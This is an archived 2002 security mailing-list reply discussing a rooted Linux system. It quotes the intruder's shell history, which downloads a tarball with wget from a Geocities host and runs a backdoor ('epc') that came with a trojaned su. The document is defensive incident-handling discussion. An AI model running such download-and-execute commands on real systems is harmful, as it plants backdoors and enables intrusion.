Re: Rooted, .haos on system

From: zeno (bugtraq@cgisecurity.net)
Date: 12/16/02

  • Next message: Carlos Eduardo Pedroza Santiviago: "Re: Rooted, .haos on system"
    From: zeno <bugtraq@cgisecurity.net>
    To: damian@sentex.net (Damian Gerow)
    Date: Mon, 16 Dec 2002 15:54:02 -0500 (EST)
    
    

    > Left in the .bash_history was this:
    >
    > w
    > cd /tmp
    > wget www.geocities.com/Lebadash/loc.tgz; tar xvzf loc.tgz
    > ./epc
    >
    > A quick check tells me that 'epc' is a backdoor utility, and the other
    > file contained within loc.tgz looks like a trojaned 'su'.

    Maybe you should email this dude. He wrote the exploit (or so the exploit says)

    "su exploit by XP <xp@xtreme-power.com>
    Enjoy!
    "

    Other neat stuff if you do a strings on the two filenames.

    >
    > I've already notified Geocities abuse, and haven't heard back from them
    > yet.
    >i

    The domain name resolves to http://www.djteckh.com/ maybe worth checking out.

     
    > ----------------------------------------------------------------------------
    > This list is provided by the SecurityFocus ARIS analyzer service.
    > For more information on this free incident handling, management
    > and tracking system please see: http://aris.securityfocus.com
    >
    >

    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management
    and tracking system please see: http://aris.securityfocus.com



    Relevant Pages

    • RE: Malicious web sites
      ... > This list is provided by the SecurityFocus ARIS analyzer service. ... > For more information on this free incident handling, management ... > and tracking system please see: http://aris.securityfocus.com ...
      (Incidents)
    • Re: [incident] IIS defacement through FTP, possible DoS
      ... > This list is provided by the SecurityFocus ARIS analyzer service. ... > For more information on this free incident handling, management ... > and tracking system please see: http://aris.securityfocus.com ...
      (Incidents)
    • RE: Distributed ICMP/UDP scan or attack?
      ... This list is provided by the SecurityFocus ARIS analyzer service. ... and tracking system please see: http://aris.securityfocus.com ... For more information on this free incident handling, management ...
      (Incidents)
    • Re: strange attacks - flood udp packets from 1030 to msql
      ... > This list is provided by the SecurityFocus ARIS analyzer service. ... For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com ...
      (Incidents)
    • RE: Can anyone identify this backdoor?
      ... > and tracking system please see: http://aris.securityfocus.com ... This list is provided by the SecurityFocus ARIS analyzer service. ... For more information on this free incident handling, management ...
      (Incidents)